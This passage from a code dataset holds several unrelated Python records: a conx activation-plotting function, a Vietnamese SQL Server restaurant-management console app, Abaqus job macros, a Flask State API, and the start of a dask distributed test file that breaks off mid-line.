SVG(svg.decode())\n\n\ndef plot_activations(net, from_layer, from_units, to_layer, to_unit,\n colormap, default_from_layer_value, resolution,\n act_range, show_values):\n # first do some error checking\n assert net[from_layer] is not None, \"unknown layer: %s\" % (from_layer,)\n assert type(from_units) in (tuple, list) and len(from_units) == 2, \\\n \"expected a pair of ints for the %s units but got %s\" % (from_layer, from_units)\n ix, iy = from_units\n assert 0 <= ix < net[from_layer].size, \"no such %s layer unit: %d\" % (from_layer, ix)\n assert 0 <= iy < net[from_layer].size, \"no such %s layer unit: %d\" % (from_layer, iy)\n assert net[to_layer] is not None, \"unknown layer: %s\" % (to_layer,)\n assert type(to_unit) is int, \"expected an int for the %s unit but got %s\" % (to_layer, to_unit)\n assert 0 <= to_unit < net[to_layer].size, \"no such %s layer unit: %d\" % (to_layer, to_unit)\n\n if colormap is None: colormap = get_colormap()\n if plt is None:\n raise Exception(\"matplotlib was not loaded\")\n act_min, act_max = net[from_layer].get_act_minmax() if act_range is None else act_range\n out_min, out_max = net[to_layer].get_act_minmax()\n if resolution is None:\n resolution = (act_max - act_min) / 50 # 50x50 pixels by default\n xmin, xmax, xstep = act_min, act_max, resolution\n ymin, ymax, ystep = act_min, act_max, resolution\n xspan = xmax - xmin\n yspan = ymax - ymin\n xpixels = int(xspan/xstep)+1\n ypixels = int(yspan/ystep)+1\n mat = np.zeros((ypixels, 
xpixels))\n ovector = net[from_layer].make_dummy_vector(default_from_layer_value)\n for row in range(ypixels):\n for col in range(xpixels):\n # (x,y) corresponds to lower left corner point of pixel\n x = xmin + xstep*col\n y = ymin + ystep*row\n vector = copy.copy(ovector)\n vector[ix] = x\n vector[iy] = y\n activations = net.propagate_from(from_layer, vector, to_layer, visualize=False)\n mat[row,col] = activations[to_unit]\n fig, ax = plt.subplots()\n axim = ax.imshow(mat, origin='lower', cmap=colormap, vmin=out_min, vmax=out_max)\n ax.set_title(\"Activation of %s[%s]\" % (to_layer, to_unit))\n ax.set_xlabel(\"%s[%s]\" % (from_layer, ix))\n ax.set_ylabel(\"%s[%s]\" % (from_layer, iy))\n ax.xaxis.tick_bottom()\n ax.set_xticks([i*(xpixels-1)/4 for i in range(5)])\n ax.set_xticklabels([xmin+i*xspan/4 for i in range(5)])\n ax.set_yticks([i*(ypixels-1)/4 for i in range(5)])\n ax.set_yticklabels([ymin+i*yspan/4 for i in range(5)])\n cbar = fig.colorbar(axim)\n plt.show(block=False)\n # optionally print out a table of activation values\n if show_values:\n s = '\\n'\n for y in np.linspace(act_max, act_min, 20):\n for x in np.linspace(act_min, act_max, 20):\n vector = [default_from_layer_value] * net[from_layer].size\n vector[ix] = x\n vector[iy] = y\n out = net.propagate_from(from_layer, vector, to_layer)[to_unit]\n s += '%4.2f ' % out\n s += '\\n'\n separator = 100 * '-'\n s += separator\n print(\"%s\\nActivation of %s[%d] as a function of %s[%d] and %s[%d]\" %\n (separator, to_layer, to_unit, from_layer, ix, from_layer, iy))\n print(\"rows: %s[%d] decreasing from %.2f to %.2f\" % (from_layer, iy, act_max, act_min))\n print(\"cols: %s[%d] increasing from %.2f to %.2f\" % (from_layer, ix, act_min, act_max))\n print(s)\n\n","sub_path":"conx/graphs.py","file_name":"graphs.py","file_ext":"py","file_size_in_byte":5714,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
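The docstrings above double as usage hints; here is a short sketch of driving the two simpler plotting helpers directly. The import path is taken from the record's sub_path, and matplotlib must be installed since both functions draw with plt:

```python
import numpy as np
from conx.graphs import plot_f, plot

# Plot a single function over a range.
plot_f(np.tanh, frange=(-3, 3, 0.1), symbol="-")

# Plot one named series with its own symbol, as the plot() docstring shows.
plot([["Error", "o-", [0.9, 0.5, 0.3, 0.2, 0.15]]],
     xlabel="epoch", ylabel="error")
```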
+{"seq_id":"27113940","text":"import pyodbc \r\nimport datetime\r\nconn = pyodbc.connect('Driver={SQL Server};'\r\n\t\t\t\t\t\t'Server=ADMIN\\KAITO;'\r\n\t\t\t\t\t\t'Database=QuanLyNhaHang;'\r\n\t\t\t\t\t\t'Trusted_Connection=yes;')\r\nclass menu():\r\n\tdef __init__(self,idfood,food,count):\r\n\t\tself.idfood=idfood\r\n\t\tself.food=food\r\n\t\tself.count=count\r\ndef giaodienmenu():\r\n\tcursorMenu= conn.cursor()\r\n\tcursorMenu.execute('SELECT * FROM Food')\r\n\tprint (\"ID\\t\\t\\tFOOD\\t\\t\\tPRICE\")\r\n\tprint (\"---------------------------------------------------------------\")\r\n\tfor i in cursorMenu:\r\n\t\tprint (\"%s\\t\\t\\t%s\\t\\t\\t%d\" % (i[0],i[1],i[2]))\r\n\tprint (\"---------------------------------------------------------------\")\r\ndef giaodiengoimon():\r\n\tcursorTable=conn.cursor()\r\n\tkt=0\r\n\tcursorTable.execute('SELECT * FROM TableFood WHERE status=0')\r\n\tfor i in cursorTable:\r\n\t\tkt=kt+1\r\n\tif(kt==0):\r\n\t\tprint(\"Tất cả các bàn đều có người vui lòng quay lại sau.\")\r\n\telse:\r\n\t\tcursorTable.execute('SELECT * FROM TableFood')\r\n\t\tprint (\"ID\\t\\t\\tNAME\\t\\tSTATUS\")\r\n\t\tprint (\"---------------------------------------------------------------\")\r\n\t\tfor i in cursorTable:\r\n\t\t\tif(i[2]==0):\r\n\t\t\t\tstatus=\"Trống\"\r\n\t\t\telse:\r\n\t\t\t\tstatus=\"Có người\"\r\n\t\t\tprint (\"%s\\t\\t\\t%s\\t\\t%s\" % (i[0],i[1],status))\r\n\t\tprint (\"---------------------------------------------------------------\")\r\n\t\tkt=True\r\n\t\twhile(kt):\r\n\t\t\tMaTable=int(input(\"Nhập ID bàn bạn muốn đặt: \"))\r\n\t\t\tcursorTable.execute('SELECT * FROM TableFood WHERE id=(?)',(MaTable))\r\n\t\t\tkiemtra=0\r\n\t\t\tfor i in cursorTable:\r\n\t\t\t\tkiemtra=kiemtra+1\r\n\t\t\t\tif(i[2]==0):\r\n\t\t\t\t\tkt=False\r\n\t\t\t\telse:\r\n\t\t\t\t\tprint(\"Bàn bạn đặt đã có người vui lòng nhập lại ID bàn bạn muốn đặt.\")\r\n\t\t\tif(not kt):\r\n\t\t\t\tprint(\"Bạn đã đặt bàn thành công\")\r\n\t\t\t\tcursorTable.execute('UPDATE TableFood SET status=1 WHERE id=(?)',(MaTable))\r\n\t\t\t\tconn.commit()\r\n\t\t\tif(kiemtra==0):\r\n\t\t\t\tprint(\"Không ID này trong nhà hàng.Vui lòng nhập lại!\")\r\n\t\tgiaodienmenu()\r\n\t\ttongtien=0\r\n\t\tcursorBill=conn.cursor()\r\n\t\tcursorCount=conn.cursor()\r\n\t\tcursorBillInfo=conn.cursor()\r\n\t\tcursorMenu= conn.cursor()\r\n\t\tcursorBill.execute('INSERT INTO Bill(idTable,CheckIn,Checkout,Totalprice,status) VALUES (?,?,?,?,?)',(MaTable,datetime.datetime.today(),'',tongtien,0))\r\n\t\tconn.commit()\r\n\t\tdsmenu=[]\r\n\t\twhile(True):\r\n\t\t\tprint(\"Nhập 1: để gọi món\")\r\n\t\t\tprint(\"Nhập 2: để chốt hoá đơn\")\r\n\t\t\tprint(\"Nhập 3: Exit\")\r\n\t\t\ttest=int(input(\"Nhập lựa chọn: \"))\r\n\t\t\tif(test==1):\r\n\t\t\t\twhile(True):\r\n\t\t\t\t\tMaFood=int(input(\"Nhập ID món ăn bạn muốn gọi: \"))\r\n\t\t\t\t\tcursorMenu.execute('SELECT id,name FROM Food WHERE id=(?)',(MaFood))\r\n\t\t\t\t\tkt=0\r\n\t\t\t\t\tfor i in cursorMenu:\r\n\t\t\t\t\t\tNameFood=i[1]\r\n\t\t\t\t\t\tkt=kt+1\r\n\t\t\t\t\tif(kt==0):\r\n\t\t\t\t\t\tprint(\"Nhập sai ID vui lòng nhập lại!\")\r\n\t\t\t\t\telse:\r\n\t\t\t\t\t\tbreak\r\n\t\t\t\twhile(True):\r\n\t\t\t\t\tsoluong=int(input(\"Nhập số lượng bạn muốn gọi: \"))\r\n\t\t\t\t\tif(soluong<1):\r\n\t\t\t\t\t\tprint(\"Số lượng không thể nhỏ hơn 1! 
Vui lòng nhập lại.\")\r\n\t\t\t\t\telse:\r\n\t\t\t\t\t\tMondagoi=menu(MaFood,NameFood,soluong)\r\n\t\t\t\t\t\tdsmenu.append(Mondagoi)\r\n\t\t\t\t\t\tcursorCount.execute('SELECT count FROM Food WHERE id=(?)',(MaFood))\r\n\t\t\t\t\t\tfor i in cursorCount:\r\n\t\t\t\t\t\t\tDem=i[0]\r\n\t\t\t\t\t\tDem=Dem+soluong\r\n\t\t\t\t\t\tcursorCount.execute('UPDATE Food SET count=(?) WHERE id=(?)',(Dem,MaFood))\r\n\t\t\t\t\t\tconn.commit()\r\n\t\t\t\t\t\tbreak\r\n\t\t\t\tprint(\"Đặt món thành công.\")\r\n\t\t\t\tcursorMenu.execute('SELECT * FROM Food WHERE id=(?)',(MaFood))\r\n\t\t\t\tfor i in cursorMenu:\r\n\t\t\t\t\ttongtien=tongtien+i[2]*soluong\r\n\t\t\t\tcursorBill.execute('SELECT id FROM Bill WHERE idTable=(?) and status=0',(MaTable))\r\n\t\t\t\tfor i in cursorBill:\r\n\t\t\t\t\tidBill=i[0]\r\n\t\t\t\tcursorBill.execute('UPDATE Bill SET Totalprice=(?) WHERE id=(?)',(tongtien,idBill))\r\n\t\t\t\tconn.commit()\r\n\t\t\telif(test==2):\r\n\t\t\t\tif(tongtien==0):\r\n\t\t\t\t\tprint(\"Bạn chưa chọn món nào để chốt hoá đơn!\")\r\n\t\t\t\telse:\r\n\t\t\t\t\tprint (\"IdTable\\t\\t\\tNAME\\t\\tSoLuong\")\r\n\t\t\t\t\tfor i in dsmenu:\r\n\t\t\t\t\t\tprint(\"%d\\t\\t\\t%s\\t\\t%d\" %(i.idfood,i.food,i.count))\r\n\t\t\t\t\tprint(\"Tổng tiền của bạn là:\"+str(tongtien)+\" VND\")\r\n\t\t\telif(test==3):\r\n\t\t\t\tbreak\r\n\t\t\telse:\r\n\t\t\t\tprint(\"Nhập sai vui lòng nhập lại lựa chọn!\")\r\ndef thaydoi():\r\n\tgiaodienmenu()\r\n\tcursorMenu= conn.cursor()\r\n\tkt=True\r\n\twhile(kt):\r\n\t\tcursorMenu.execute('SELECT id FROM Food')\r\n\t\tmaFood=int(input(\"Chọn ID món bạn muốn thay đổi giá: \"))\r\n\t\tfor i in cursorMenu:\r\n\t\t\tif(i[0]==maFood):\r\n\t\t\t\tkt=False\r\n\t\t\t\tbreak\r\n\t\tif(kt==True):\r\n\t\t\tprint(\"Không có ID này vui lòng nhập lại!\")\r\n\twhile(True):\r\n\t\tgia=int(input(\"Nhập giá mà bạn muốn đổi: \"))\r\n\t\tif(gia<1):\r\n\t\t\tprint(\"Giá không hợp lí vui lòng nhập lại!\")\r\n\t\telse:\r\n\t\t\tbreak\r\n\tcursorMenu.execute('UPDATE Food SET price=(?) 
WHERE id=(?)',(gia,maFood))\r\n\tconn.commit()\r\n\tprint(\"Thay đổi giá món ăn thành công.\")\t\r\n\tgiaodienmenu()\r\ndef suamenu():\r\n\tgiaodienmenu()\r\n\twhile(True):\r\n\t\tcursorMenu= conn.cursor()\r\n\t\tcursorBillInfo=conn.cursor()\r\n\t\tprint(\"1:Xoá món ăn\")\r\n\t\tprint(\"2:Thêm món ăn\")\r\n\t\tprint(\"3:Exit\")\r\n\t\ttest=int(input(\"Nhập lựa chọn: \"))\r\n\t\tif(test==1):\r\n\t\t\tkt=True\r\n\t\t\twhile(kt):\r\n\t\t\t\tcursorMenu.execute('SELECT id FROM Food')\r\n\t\t\t\tmaFood=int(input(\"Nhập ID món ăn bạn muốn xoá: \"))\r\n\t\t\t\tfor i in cursorMenu:\r\n\t\t\t\t\t\tif(i[0]==maFood):\r\n\t\t\t\t\t\t\tkt=False\r\n\t\t\t\tif(kt):\r\n\t\t\t\t\tprint(\"Không có ID này vui lòng nhập lại!\")\r\n\t\t\twhile(True):\r\n\t\t\t\tcheck=input(\"Bạn đã chắc chắn muốn xoá dữ liệu này không(Y/N): \")\r\n\t\t\t\tif(check=='Y' or check=='y'):\r\n\t\t\t\t\tcursorMenu.execute('DELETE FROM Food WHERE id=(?)',(maFood))\r\n\t\t\t\t\tconn.commit()\r\n\t\t\t\t\tprint(\"Đã xoá thành công.\")\r\n\t\t\t\t\tgiaodienmenu()\r\n\t\t\t\t\tbreak\r\n\t\t\t\telif(check=='N' or check=='n'):\r\n\t\t\t\t\tbreak\r\n\t\t\t\telse:\r\n\t\t\t\t\tprint(\"Nhập sai vui lòng nhập lại.\")\r\n\t\telif(test==2):\r\n\t\t\tkt=True\r\n\t\t\tNUll=0\r\n\t\t\twhile(kt):\r\n\t\t\t\tcursorMenu.execute('SELECT id FROM Food')\r\n\t\t\t\tmaFood=int(input(\"Nhập ID món bạn muốn thêm: \"))\r\n\t\t\t\tfor i in cursorMenu:\r\n\t\t\t\t\tNUll=NUll+1\r\n\t\t\t\t\tif(i[0]==maFood):\r\n\t\t\t\t\t\tprint(\"Nhập lại ID, ID đã tồn tại!\")\r\n\t\t\t\t\t\tkt=True\r\n\t\t\t\t\t\tbreak\r\n\t\t\t\t\telse:\r\n\t\t\t\t\t\tkt=False\r\n\t\t\t\tif(NUll==0):\r\n\t\t\t\t\tbreak\r\n\t\t\tkt=True\r\n\t\t\twhile(kt):\r\n\t\t\t\tmonan=input(\"Nhập tên món ăn bạn muốn thêm: \")\r\n\t\t\t\tif(monan==''):\r\n\t\t\t\t\tprint(\"Vui lòng nhập tên món ăn!\")\r\n\t\t\t\telse:\r\n\t\t\t\t\tNUll=0\r\n\t\t\t\t\tcursorMenu.execute('SELECT name FROM Food')\r\n\t\t\t\t\tfor i in cursorMenu:\r\n\t\t\t\t\t\tNUll=NUll+1\r\n\t\t\t\t\t\tif(i[0]==monan):\r\n\t\t\t\t\t\t\tprint('Tên này đã có trong menu.Vui lòng nhập lại!')\r\n\t\t\t\t\t\t\tkt=True\r\n\t\t\t\t\t\t\tbreak\r\n\t\t\t\t\t\telse:\r\n\t\t\t\t\t\t\tkt=False\r\n\t\t\t\t\tif(NUll==0):\r\n\t\t\t\t\t\tbreak\r\n\t\t\twhile(True):\r\n\t\t\t\tgia=int(input(\"Nhập giá món ăn: \"))\r\n\t\t\t\tif(gia<1):\r\n\t\t\t\t\tprint(\"Giá không hợp lý vui lòng nhập lại!\")\r\n\t\t\t\telse:\r\n\t\t\t\t\tbreak\r\n\t\t\tcursorMenu.execute(\"INSERT INTO Food(id,name,price) VALUES (?,?,?)\",(maFood,monan,gia))\r\n\t\t\tconn.commit()\r\n\t\t\tprint(\"Thêm món ăn thành công.\")\r\n\t\t\tgiaodienmenu()\r\n\t\telif(test==3):\r\n\t\t\tbreak\r\n\t\telse:\r\n\t\t\tprint(\"Không có lựa chọn này vui lòng chọn lại!\")\r\ndef dangnhap():\r\n\tcursorAcc=conn.cursor()\r\n\tkt=True\r\n\twhile(kt):\r\n\t\tcursorAcc.execute('SELECT * FROM Account')\r\n\t\twhile (True):\r\n\t\t\taccount=input(\"Nhập tên đăng nhập:\")\r\n\t\t\tif(account==''):\r\n\t\t\t\tprint('Vui lòng nhập tên đăng nhập!')\r\n\t\t\telse:\r\n\t\t\t\tbreak\r\n\t\twhile(True):\r\n\t\t\tpassword=input(\"Nhập mật khẩu:\")\r\n\t\t\tif(password==''):\r\n\t\t\t\tprint('Vui lòng nhập mật khẩu!')\r\n\t\t\telse:\r\n\t\t\t\tbreak\r\n\t\tfor i in cursorAcc:\r\n\t\t\tif(account==i[0] and password==i[1]):\r\n\t\t\t\tkt=False\r\n\t\tif(kt):\t\r\n\t\t\tprint(\"Tài khoản hoặc mật khẩu của ban bị sai,vui lòng nhập lại!\")\r\n\tgiaodienAdmin()\r\ndef giaodienAdmin():\r\n\twhile(True):\r\n\t\tprint(\"1:Xem menu\")\r\n\t\tprint(\"2:Đặt món,chọn bàn\")\r\n\t\tprint(\"3:Thay đổi giá của món 
ăn\")\r\n\t\tprint(\"4:Thay đổi menu\")\r\n\t\tprint(\"5:Xem hoá đơn chưa thanh toán\")\r\n\t\tprint(\"6:Xem tổng doanh thu trong ngày\")\r\n\t\tprint(\"7:Exit\")\r\n\t\ttest=int(input(\"Nhập lựa chọn của bạn: \"))\r\n\t\tif(test==1):\r\n\t\t\tgiaodienmenu()\r\n\t\telif(test==2):\r\n\t\t\tgiaodiengoimon()\r\n\t\telif(test==3):\r\n\t\t\tthaydoi()\r\n\t\telif(test==4):\r\n\t\t\tsuamenu()\r\n\t\telif(test==5):\r\n\t\t\tBill()\r\n\t\telif(test==6):\r\n\t\t\tcheckDoanhthu()\r\n\t\telif(test==7):\r\n\t\t\tbreak\r\n\t\telse:\r\n\t\t\tprint(\"Nhập sai vui lòng nhập lại.\")\r\ndef giaodienKhach():\r\n\twhile(True):\r\n\t\tprint(\"1:Xem menu\")\r\n\t\tprint(\"2:Đặt món,chọn bàn\")\r\n\t\tprint(\"3:Exit\")\r\n\t\ttest=int(input(\"Nhập lựa chọn của bạn: \"))\r\n\t\tif(test==1):\r\n\t\t\tgiaodienmenu()\r\n\t\telif(test==2):\r\n\t\t\tgiaodiengoimon()\r\n\t\t\tbreak\r\n\t\telif(test==3):\r\n\t\t\tbreak\r\n\t\telse:\r\n\t\t\tprint(\"Nhập sai vui lòng nhập lại.\")\r\ndef Bill():\r\n\tcursorTable=conn.cursor()\r\n\tTable={}\r\n\tcursorTable.execute('SELECT id,name FROM TableFood')\r\n\tfor i in cursorTable:\r\n\t\tTable[i[0]]=i[1]\r\n\twhile(True):\r\n\t\tcursorBill=conn.cursor()\r\n\t\tcursorMenu=conn.cursor()\r\n\t\tcursorBill.execute('SELECT * FROM Bill WHERE status=0' )\r\n\t\tprint (\"ID\\t\\t\\tNAME_TABLE\\tCheckIn\\t\\t\\t\\t\\t\\tTotal_Price\")\r\n\t\tfor i in cursorBill:\r\n\t\t\tprint (\"%d\\t\\t\\t%s\\t\\t%s\\t\\t\\t%d\" % (i[0],Table[i[1]],i[2],i[4]))\r\n\t\tprint(\"1:Chọn hoá đơn thanh toán\")\r\n\t\tprint(\"2:Thoát\")\r\n\t\ttest=int(input(\"Nhập lựa chọn của bạn: \"))\r\n\t\tif(test==1):\r\n\t\t\tkt=True\r\n\t\t\twhile(kt):\r\n\t\t\t\tcursorBill.execute('SELECT * FROM Bill WHERE status=0')\r\n\t\t\t\tmaBill=int(input(\"Chọn ID hoá đơn thanh toán: \"))\r\n\t\t\t\tfor i in cursorBill:\r\n\t\t\t\t\tif(maBill==i[0]):\r\n\t\t\t\t\t\tkt=False\r\n\t\t\t\t\t\tMaTable=i[1]\r\n\t\t\t\tif(kt==True):\r\n\t\t\t\t\tprint(\"Nhập sai ID vui lòng nhập lại.\")\r\n\t\t\tcursorBill.execute('SELECT Totalprice FROM Bill WHERE id=(?)',maBill)\r\n\t\t\tfor i in cursorBill:\r\n\t\t\t\tprint(\"Tổng tiền hoá đơn là:\",i[0])\r\n\t\t\tcursorBill.execute('UPDATE Bill SET Checkout=(?),status=(?) WHERE id=(?)',(datetime.datetime.today(),1,maBill))\r\n\t\t\tconn.commit()\r\n\t\t\tcursorTableFood=conn.cursor()\r\n\t\t\tcursorTableFood.execute('UPDATE TableFood SET status=(?) WHERE id=(?)',(0,MaTable))\r\n\t\t\tconn.commit()\r\n\t\telif(test==2):\r\n\t\t\tbreak\r\n\t\telse:\r\n\t\t\tprint(\"Nhập sai vui lòng nhập lại.\")\r\ndef checkDoanhthu():\r\n\tcursorBill=conn.cursor()\r\n\twhile(True):\r\n\t\tprint(\"1:Xem doanh thu của ngày hôm nay\")\r\n\t\tprint(\"2:Xem doanh thu của tháng\")\r\n\t\tprint(\"3:Xem doanh thu của quý\")\r\n\t\tprint(\"4:Exit\")\r\n\t\ttest=int(input(\"Nhập lựa chọn của bạn: \"))\r\n\t\tif(test==1):\r\n\t\t\tcursorBill.execute('SELECT Totalprice FROM Bill WHERE status=1 And day(Checkout)=(?) and month(Checkout)=(?) 
and year(Checkout)=(?)',(datetime.date.today().day,datetime.date.today().month,datetime.date.today().year))\r\n\t\t\tTongdoanhso=0\r\n\t\t\tfor i in cursorBill:\r\n\t\t\t\tTongdoanhso=Tongdoanhso+i[0]\r\n\t\t\tprint(\"Tổng doanh số ngày hôm nay là: \",Tongdoanhso,\"VND\")\r\n\t\telif(test==2):\r\n\t\t\twhile(True):\r\n\t\t\t\tthang=int(input(\"Nhập tháng bạn muốn xem: \"))\r\n\t\t\t\tif(thang<=0 or thang>12):\r\n\t\t\t\t\tprint(\"Nhập tháng sai vui lòng nhập lại!\")\r\n\t\t\t\telse:\r\n\t\t\t\t\tbreak\r\n\t\t\tTongdoanhso=0\r\n\t\t\tcursorBill.execute('SELECT Totalprice FROM Bill WHERE status=1 and month(Checkout)=(?) and year(Checkout)=(?)',(thang,datetime.date.today().year))\r\n\t\t\tfor i in cursorBill:\r\n\t\t\t\tTongdoanhso=Tongdoanhso+i[0]\r\n\t\t\tprint(\"Doanh số của tháng \"+str(thang)+\" là:\",Tongdoanhso,\"VND\")\r\n\t\telif(test==3):\r\n\t\t\twhile(True):\r\n\t\t\t\tquy=int(input(\"Nhập quý bạn muốn xem: \"))\r\n\t\t\t\tif(quy<=0 or quy>4):\r\n\t\t\t\t\tprint(\"Nhập sai quý vui lòng nhập lại!\")\r\n\t\t\t\telse:\r\n\t\t\t\t\tbreak\r\n\t\t\tthang=quy*3\r\n\t\t\tTongdoanhso=0\r\n\t\t\tfor x in range(0,3):\r\n\t\t\t\tcursorBill.execute('SELECT Totalprice FROM Bill WHERE status=1 and month(Checkout)=(?) and year(Checkout)=(?)',(thang,datetime.date.today().year))\r\n\t\t\t\tfor i in cursorBill:\r\n\t\t\t\t\tTongdoanhso=Tongdoanhso+i[0]\r\n\t\t\t\tthang=thang-1\r\n\t\t\tprint(\"Doanh số của quý \"+str(quy)+\" là:\",Tongdoanhso,\"VND\")\r\n\t\telif(test==4):\r\n\t\t\tbreak\r\n\t\telse:\r\n\t\t\tprint(\"Nhập sai vui lòng nhập lại.\")\r\ndef giaodienBandau():\r\n\twhile(True):\r\n\t\tprint(\"1:Đăng nhập để quản lý nhà hàng.\")\r\n\t\tprint(\"2:Là Khách hàng muốn xem menu và gọi món.\")\r\n\t\ttest=int(input(\"Nhập lựa chọn: \"))\r\n\t\tif(test==1):\r\n\t\t\tdangnhap()\r\n\t\t\tbreak\r\n\t\telif(test==2):\r\n\t\t\tgiaodienKhach()\r\n\t\t\tbreak\r\n\t\telse:\r\n\t\t\tprint(\"Nhập sai vui lòng nhập lại.\")\r\ngiaodienBandau()","sub_path":"B.py","file_name":"B.py","file_ext":"py","file_size_in_byte":12169,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
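The database access pattern above is plain pyodbc with '?' placeholders; here is a standalone sketch of the same pattern (the server name below is a placeholder, not the machine name from this file):

```python
import pyodbc

conn = pyodbc.connect('Driver={SQL Server};'
                      'Server=localhost;'
                      'Database=QuanLyNhaHang;'
                      'Trusted_Connection=yes;')
cursor = conn.cursor()

# Parameters are always passed separately from the SQL text.
cursor.execute('SELECT id, name, price FROM Food WHERE price < ?', (50000,))
for row in cursor:
    print(row.id, row.name, row.price)

cursor.execute('UPDATE Food SET price = ? WHERE id = ?', (45000, 3))
conn.commit()
```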
+{"seq_id":"496441715","text":"\"\"\" Macros functions to be used in Abaqus environment.\n abaqusMacros.cfg file is expected to be in the same folder as\n this script.\n Ideally, put both in the /site folder of your Abaqus installation,\n otherwise you could place them in the working directory, but if\n the interpreter switches to another directory, it won't be able\n to read the macros.\n \n Developed by Rodrigo Rivero.\n https://github.com/rodrigo1392\"\"\"\nfrom __future__ import print_function\n# -*- coding: mbcs -*-\n# Do not delete the following import lines\nfrom abaqus import *\nfrom abaqusConstants import *\nimport __main__\nimport ConfigParser as configparser\n\n\n# Config input file\nconfig_file_path = __file__.replace('.py', '.cfg').replace('.pyc', '.cfg').replace('.cfgc', '.cfg')\ncfg = configparser.ConfigParser()\ncfg.read(config_file_path)\n\n\n# Extract input data and process it\nCPUS_NUMBER = eval(cfg.get('MACROS', 'CPUS_NUMBER'))\nprint('CPUS_NUMBER:', CPUS_NUMBER)\n\n\ndef jobs_create_4all_models():\n \"\"\"\n Creates a Job for every Model in the Database, if it doesn`t exist yet,\n with the assigned characteristics.\n \"\"\"\n global CPUS_NUMBER\n for model_key, model in mdb.models.items():\n # Replace all blank spaces for underscores\n model_name = model_key.replace(' ', '_')\n # Create the Job using each Model name\n if model_name not in mdb.jobs.keys():\n jobs_create_4all_models_with_overwrite()\n return\n\n\ndef jobs_create_4all_models_with_overwrite():\n \"\"\"\n Creates a Job for every Model in the Database, with the\n assigned characteristics.\n \"\"\"\n global CPUS_NUMBER\n for model_key, model in mdb.models.items():\n # Replace all blank spaces for underscores\n model_name = model_key.replace(' ', '_')\n # Create the Job using each Model name\n mdb.Job(name=str(model_name), model=model, description='',\n type=ANALYSIS, atTime=None, waitMinutes=0, waitHours=0,\n queue=None, memory=90, memoryUnits=PERCENTAGE,\n getMemoryFromAnalysis=True, explicitPrecision=SINGLE,\n nodalOutputPrecision=SINGLE, echoPrint=OFF, modelPrint=OFF,\n contactPrint=OFF, historyPrint=OFF, userSubroutine='',\n scratch='', resultsFormat=ODB, multiprocessingMode=DEFAULT,\n numCpus=CPUS_NUMBER, numDomains=CPUS_NUMBER)\n return\n\n\ndef jobs_run_all():\n \"\"\" Runs all the Jobs contained in the Database, one at a time. \"\"\"\n jobs_count = 1\n for job_key, job in mdb.jobs.items():\n job.submit(consistencyChecking=OFF)\n print('Job number ', str(jobs_count), ' of: ', str(len(mdb.jobs)))\n job.waitForCompletion()\n jobs_count += 1\n return\n\n\ndef jobs_run_not_completed():\n \"\"\" Runs all Jobs contained in the Database which status in not\n COMPLETED, one at a time. \"\"\"\n jobs_count = 1\n for job_key, job in mdb.jobs.items():\n if job.status != COMPLETED:\n job.submit(consistencyChecking=OFF)\n print('Job number ', str(jobs_count))\n job.waitForCompletion()\n jobs_count += 1\n return\n\n\ndef models_replace_blank_spaces():\n \"\"\" Replaces all blank spaces in the names of the Models\n present in the current Database for underscores. \"\"\"\n for model_key in mdb.models.keys():\n mdb.models.changeKey(fromName=model_key,\n toName=model_key.replace(\" \", \"_\"))\n return\n\n\ndef odbs_close_all_odbs():\n \"\"\" Closes all Odbs that are open on the current Session. 
\"\"\"\n for odb_key, odb in session.odbs.items():\n odb.close()\n return\n\n\ndef xydata_clean_all_xydata():\n \"\"\" Erases all xyData from the current Session \"\"\"\n for xydata_key, xydata in session.xyDataObjects.items():\n del xydata\n return\n\n\ndef xyplots_clean_all_xyplots():\n \"\"\" Erases all xyPlots from the current Session. \"\"\"\n for xyplot_key, xyplot in session.xyPlots.items():\n del xyplot\n return\n","sub_path":"abaqusMacros.py","file_name":"abaqusMacros.py","file_ext":"py","file_size_in_byte":3965,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
+{"seq_id":"122439620","text":"#!/usr/bin/python3\n\"\"\"States module\"\"\"\nfrom api.v1.views import app_views\nfrom flask import jsonify, abort, make_response, request\nfrom models import storage\nfrom models.state import State\n\n\n@app_views.route('/states', methods=['GET'], strict_slashes=False)\n@app_views.route('/states/', methods=['GET'])\ndef all_states(state_id=None):\n \"\"\"Returns all state objects handeling states id\"\"\"\n states = []\n for value in storage.all(State).values():\n states.append(value.to_dict())\n if not state_id:\n return jsonify(states)\n get_state = storage.get(State, state_id)\n if get_state is None:\n abort(404)\n return jsonify(get_state.to_dict())\n\n\n@app_views.route('/states/', methods=['DELETE'])\ndef delete_state(state_id=None):\n \"\"\"Deletes a state objects by id\"\"\"\n get_state = storage.get(State, state_id)\n if get_state is not None:\n storage.delete(get_state)\n storage.save()\n return make_response(jsonify({}), 200)\n abort(404)\n\n\n@app_views.route('/states', methods=['POST'], strict_slashes=False)\ndef creates_state():\n \"\"\"Creates a state object\"\"\"\n get_states = request.get_json()\n if not get_states:\n abort(400, 'Not a JSON')\n elif 'name' not in get_states:\n abort(400, 'Missing name')\n new_obj = State(name=get_states['name'])\n storage.new(new_obj)\n storage.save()\n return jsonify(new_obj.to_dict()), 201\n\n\n@app_views.route('/states/', methods=['PUT'])\ndef update_state(state_id=None):\n \"\"\"Updates a state objects by id\"\"\"\n state = storage.get(State, state_id)\n if not state:\n abort(404)\n\n get_states = request.get_json()\n if not get_states:\n abort(400, 'Not a JSON')\n\n for key, value in get_states.items():\n if key not in [\"id\", \"created_at\", \"updated_at\"]:\n setattr(state, key, value)\n state.save()\n return jsonify(state.to_dict()), 200\n","sub_path":"api/v1/views/states.py","file_name":"states.py","file_ext":"py","file_size_in_byte":1930,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
+{"seq_id":"201413903","text":"from __future__ import print_function, division, absolute_import\n\nfrom concurrent.futures import CancelledError\nfrom operator import add\nfrom time import time, sleep\n\nfrom dask import delayed\nimport pytest\nfrom toolz import partition_all\nfrom tornado import gen\n\nfrom distributed.executor import _wait\nfrom distributed.utils import sync\nfrom distributed.utils_test import (gen_cluster, cluster, inc, loop, slow, div,\n slowinc, slowadd)\nfrom distributed import Executor, Nanny, wait\n\n\ndef test_submit_after_failed_worker(loop):\n with cluster() as (s, [a, b]):\n with Executor(('127.0.0.1', s['port']), loop=loop) as e:\n L = e.map(inc, range(10))\n wait(L)\n a['proc'].terminate()\n total = e.submit(sum, L)\n assert total.result() == sum(map(inc, range(10)))\n\n\ndef test_gather_after_failed_worker(loop):\n with cluster() as (s, [a, b]):\n with Executor(('127.0.0.1', s['port']), loop=loop) as 